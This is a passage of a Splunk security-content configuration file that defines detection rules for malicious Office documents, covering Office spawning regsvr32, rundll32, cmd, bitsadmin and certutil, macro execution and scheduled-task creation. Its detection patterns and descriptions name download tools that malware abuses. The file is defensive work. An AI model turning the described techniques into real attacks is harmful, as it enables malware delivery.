provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-02-15 action.escu.modification_date = 2023-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Application Spawn Regsvr32 process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Qakbot"] action.risk = 1 action.risk.param._risk_message = Office application spawning regsvr32.exe on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Application Spawn Regsvr32 process - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Qakbot"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this detection was designed to identifies suspicious spawned process of known MS office application due to macro or malicious code. this technique can be seen in so many malware like IcedID that used MS office as its weapon or attack vector to initially infect the machines. action.notable.param.rule_title = Office Application Spawn Regsvr32 process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name = "outlook.exe" OR Processes.parent_process_name = "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name="msaccess.exe") `process_regsvr32` by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_application_spawn_regsvr32_process_filter` [ESCU - Office Application Spawn rundll32 process - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. this technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. this technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-02-15 action.escu.modification_date = 2023-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Application Spawn rundll32 process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Trickbot", "IcedID", "AgentTesla", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Office application spawning rundll32.exe on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Application Spawn rundll32 process - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Trickbot", "IcedID", "AgentTesla", "NjRAT"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection was designed to identify suspicious spawned processes of known MS office applications due to macro or malicious code. this technique can be seen in so many malware like trickbot that used MS office as its weapon or attack vector to initially infect the machines. action.notable.param.rule_title = Office Application Spawn rundll32 process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name= "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name = "msaccess.exe") AND `process_rundll32` by Processes.parent_process Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_application_spawn_rundll32_process_filter` [ESCU - Office Document Creating Schedule Task - Rule] action.escu = 0 action.escu.enabled = 1 description = this search detects a potential malicious office document that create schedule task entry through macro VBA api or through loading taskschd.dll. This technique was seen in so many malicious macro malware that create persistence , beaconing using task schedule malware entry The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.' action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this search detects a potential malicious office document that create schedule task entry through macro VBA api or through loading taskschd.dll. This technique was seen in so many malicious macro malware that create persistence , beaconing using task schedule malware entry The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.' action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and ImageLoaded (Like sysmon EventCode 7) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Also be sure to include those monitored dll to your own sysmon config. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-02-15 action.escu.modification_date = 2023-02-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Document Creating Schedule Task - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = Office document creating a schedule task on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Document Creating Schedule Task - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search detects a potential malicious office document that create schedule task entry through macro VBA api or through loading taskschd.dll. This technique was seen in so many malicious macro malware that create persistence , beaconing using task schedule malware entry The search will return the first time and last time the task was registered, as well as the `Command` to be executed, `Task Name`, `Author`, `Enabled`, and whether it is `Hidden` or not. schtasks.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64`. The following DLL(s) are loaded when schtasks.exe or TaskService is launched -`taskschd.dll`. If found loaded by another process, it's possible a scheduled task is being registered within that process context in memory. Upon triage, identify the task scheduled source. Was it schtasks.exe or via TaskService? Review the job created and the Command to be executed. Capture any artifacts on disk and review. Identify any parallel processes within the same timeframe to identify source.' action.notable.param.rule_title = Office Document Creating Schedule Task action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 parent_process_name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe") ImageLoaded = "*\\taskschd.dll" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter` [ESCU - Office Document Executing Macro Code - Rule] action.escu = 0 action.escu.enabled = 1 description = this detection was designed to identifies suspicious office documents that using macro code. Macro code is known to be one of the prevalent weaponization or attack vector of threat actor. This malicious macro code is embed to a office document as an attachment that may execute malicious payload, download malware payload or other malware component. It is really good practice to disable macro by default to avoid automatically execute macro code while opening or closing a office document files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this detection was designed to identifies suspicious office documents that using macro code. Macro code is known to be one of the prevalent weaponization or attack vector of threat actor. This malicious macro code is embed to a office document as an attachment that may execute malicious payload, download malware payload or other malware component. It is really good practice to disable macro by default to avoid automatically execute macro code while opening or closing a office document files. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and ImageLoaded (Like sysmon EventCode 7) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Also be sure to include those monitored dll to your own sysmon config. action.escu.known_false_positives = Normal Office Document macro use for automation action.escu.creation_date = 2023-01-24 action.escu.modification_date = 2023-01-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Document Executing Macro Code - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Spearphishing Attachments", "Trickbot", "IcedID", "DarkCrystal RAT", "AgentTesla", "Qakbot", "Azorult", "Remcos", "PlugX", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Office document executing a macro on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Document Executing Macro Code - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Trickbot", "IcedID", "DarkCrystal RAT", "AgentTesla", "Qakbot", "Azorult", "Remcos", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this detection was designed to identifies suspicious office documents that using macro code. Macro code is known to be one of the prevalent weaponization or attack vector of threat actor. This malicious macro code is embed to a office document as an attachment that may execute malicious payload, download malware payload or other malware component. It is really good practice to disable macro by default to avoid automatically execute macro code while opening or closing a office document files. action.notable.param.rule_title = Office Document Executing Macro Code action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 parent_process_name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe") ImageLoaded IN ("*\\VBE7INTL.DLL","*\\VBE7.DLL", "*\\VBEUI.DLL") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter` [ESCU - Office Document Spawned Child Process To Download - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect potential malicious office document executing lolbin child process to download payload or other malware. Since most of the attacker abused the capability of office document to execute living on land application to blend it to the normal noise in the infected machine to cover its track. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect potential malicious office document executing lolbin child process to download payload or other malware. Since most of the attacker abused the capability of office document to execute living on land application to blend it to the normal noise in the infected machine to cover its track. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Default browser not in the filter list. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Document Spawned Child Process To Download - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "PlugX", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Office document spawning suspicious child process on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Document Spawned Child Process To Download - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect potential malicious office document executing lolbin child process to download payload or other malware. Since most of the attacker abused the capability of office document to execute living on land application to blend it to the normal noise in the infected machine to cover its track. action.notable.param.rule_title = Office Document Spawned Child Process To Download action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe", "Graph.exe","winproj.exe") Processes.process IN ("*http:*","*https:*") NOT (Processes.original_file_name IN("firefox.exe", "chrome.exe","iexplore.exe","msedge.exe")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_spawned_child_process_to_download_filter` [ESCU - Office Product Spawn CMD Process - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to detect a suspicious office product process that spawn cmd child process. This is commonly seen in a ms office product having macro to execute shell command to download or execute malicious lolbin relative to its malicious code. This is seen in trickbot spear phishing doc where it execute shell cmd to run mshta payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to detect a suspicious office product process that spawn cmd child process. This is commonly seen in a ms office product having macro to execute shell command to download or execute malicious lolbin relative to its malicious code. This is seen in trickbot spear phishing doc where it execute shell cmd to run mshta payload. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = IT or network admin may create an document automation that will run shell script. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawn CMD Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "DarkCrystal RAT", "Azorult", "Remcos", "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "Warzone RAT", "PlugX", "NjRAT"] action.risk = 1 action.risk.param._risk_message = an office product parent process $parent_process_name$ spawn child process $process_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawn CMD Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "DarkCrystal RAT", "Azorult", "Remcos", "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", "Warzone RAT", "PlugX", "NjRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect a suspicious office product process that spawn cmd child process. This is commonly seen in a ms office product having macro to execute shell command to download or execute malicious lolbin relative to its malicious code. This is seen in trickbot spear phishing doc where it execute shell cmd to run mshta payload. action.notable.param.rule_title = Office Product Spawn CMD Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = "winword.exe" OR Processes.parent_process_name= "excel.exe" OR Processes.parent_process_name = "powerpnt.exe" OR Processes.parent_process_name= "onenote.exe" OR Processes.parent_process_name = "onenotem.exe" OR Processes.parent_process_name = "onenoteviewer.exe" OR Processes.parent_process_name = "onenoteim.exe" OR Processes.parent_process_name = "msaccess.exe" OR Processes.parent_process_name="Graph.exe" OR Processes.parent_process_name="winproj.exe") `process_cmd` by Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest Processes.original_file_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `office_product_spawn_cmd_process_filter` [ESCU - Office Product Spawning BITSAdmin - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `bitsadmin.exe`. In malicious instances, the command-line of `bitsadmin.exe` will contain a URL to a remote destination or similar command-line arguments as transfer, Download, priority, Foreground. In addition, Threat Research has released a detections identifying suspicious use of `bitsadmin.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `bitsadmin.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `bitsadmin.exe`. In malicious instances, the command-line of `bitsadmin.exe` will contain a URL to a remote destination or similar command-line arguments as transfer, Download, priority, Foreground. In addition, Threat Research has released a detections identifying suspicious use of `bitsadmin.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `bitsadmin.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No false positives known. Filter as needed. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning BITSAdmin - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ with process id $process_id$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning BITSAdmin - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `bitsadmin.exe`. In malicious instances, the command-line of `bitsadmin.exe` will contain a URL to a remote destination or similar command-line arguments as transfer, Download, priority, Foreground. In addition, Threat Research has released a detections identifying suspicious use of `bitsadmin.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `bitsadmin.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.notable.param.rule_title = Office Product Spawning BITSAdmin action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe", "Graph.exe","winproj.exe") `process_bitsadmin` by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `office_product_spawning_bitsadmin_filter` [ESCU - Office Product Spawning CertUtil - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `certutil.exe`. In malicious instances, the command-line of `certutil.exe` will contain a URL to a remote destination. In addition, Threat Research has released a detections identifying suspicious use of `certutil.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `certutil.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `certutil.exe`. In malicious instances, the command-line of `certutil.exe` will contain a URL to a remote destination. In addition, Threat Research has released a detections identifying suspicious use of `certutil.exe`. In this instance, we narrow our detection down to the Office suite as a parent process. During triage, review all file modifications. Capture and analyze any artifacts on disk. The Office Product, or `certutil.exe` will have reached out to a remote destination, capture and block the IPs or domain. Review additional parallel processes for further activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No false positives known. Filter as needed. action.escu.creation_date = 2023-07-11 action.escu.modification_date = 2023-07-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Office Product Spawning CertUtil - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "AgentTesla", "Trickbot", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = office parent process $parent_process_name$ will execute a suspicious child process $process_name$ with process id $process_id$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Office Product Spawning CertUtil - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "AgentTesla", "Trickbot", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the latest behavior utilized by different malware families (including TA551, IcedID). This detection identifies any Windows Office Product spawning `certutil.exe`. In malicious instances, the command-line of `certutil.exe` will contain a URL to a remote destination. In addition, Threat Research has released a detections identifying suspicious use of `certutil.exe`. 